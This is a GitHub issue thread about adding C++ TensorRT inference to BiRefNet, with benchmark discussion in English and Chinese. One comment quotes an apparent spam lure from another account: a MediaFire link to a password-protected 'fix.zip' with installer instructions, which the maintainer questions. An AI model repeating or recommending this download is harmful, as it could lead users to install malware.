### ISSUE TITLE
Just the mention of tensorrt inference

### ISSUE THREAD

**Issue by lbq779660843** [ZhengPeng7/BiRefNet#68]
Hello, I am one of the authors of the repository [depth-anything-tensorrt.](https://github.com/spacewalk01/depth-anything-tensorrt) After my verification, the tensorrt inference of the c++ version of BiRefNet can apply the inference code of depth-anything-tensorrt by modifying some parameters. If necessary, I will submit a 'Pull request' to BiRefNet.
![11111](https://github.com/user-attachments/assets/04211bd7-b836-4542-8e6b-75d33ab1c776)

**Comment by ZhengPeng7** [comment]
> Hello, I am one of the authors of the repository [depth-anything-tensorrt.](https://github.com/spacewalk01/depth-anything-tensorrt) After my verification, the tensorrt inference of the c++ version of BiRefNet can apply the inference code of depth-anything-tensorrt by modifying some parameters. If necessary, I will submit a 'Pull request' to BiRefNet. ![11111](https://private-user-images.githubusercontent.com/27773249/361363519-04211bd7-b836-4542-8e6b-75d33ab1c776.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ2NjI0MTgsIm5iZiI6MTcyNDY2MjExOCwicGF0aCI6Ii8yNzc3MzI0OS8zNjEzNjM1MTktMDQyMTFiZDctYjgzNi00NTQyLThlNmItNzVkMzNhYjFjNzc2LmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjYlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI2VDA4NDgzOFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTMzMTllOTViZTU3YjFkMzRmYWQzZTlmMWEzMmVhY2MyZjk0ZjUxMzA5MDhjZWE5Zjc5NDVlZTZjYjg4MzU1MGUmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.NXhawrTQPyRta554mZQd6foe_qDc0oyTk_FjwdQcMiA)

Wow, thanks, LBQ, that would be great! Is there any speed-up with TensorRT?

**Comment by ZhengPeng7** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Hi, What is this? @swaggy111

**Comment by lbq779660843** [comment]
我用的是huggingface在线样例中五张1024*1024的例图做的测试，下面是一张图显示了推理时间，
对应的电脑的显卡是NVIDIA GeForce RTX 3080，用的模型是BiRefNet-general-bb_swin_v1_tiny-epoch_232.pth。

![222](https://github.com/user-attachments/assets/71b18481-db94-4323-9b5b-d08c021cf1ac)

**Comment by ZhengPeng7** [comment]
Hi, 非常感谢! 这里的是TensorRT下的吧? 那3080的就常规pytorch模型推理的速度是多少呢, 主要想知道下是快了多少哈, 这个信息还是很有用的
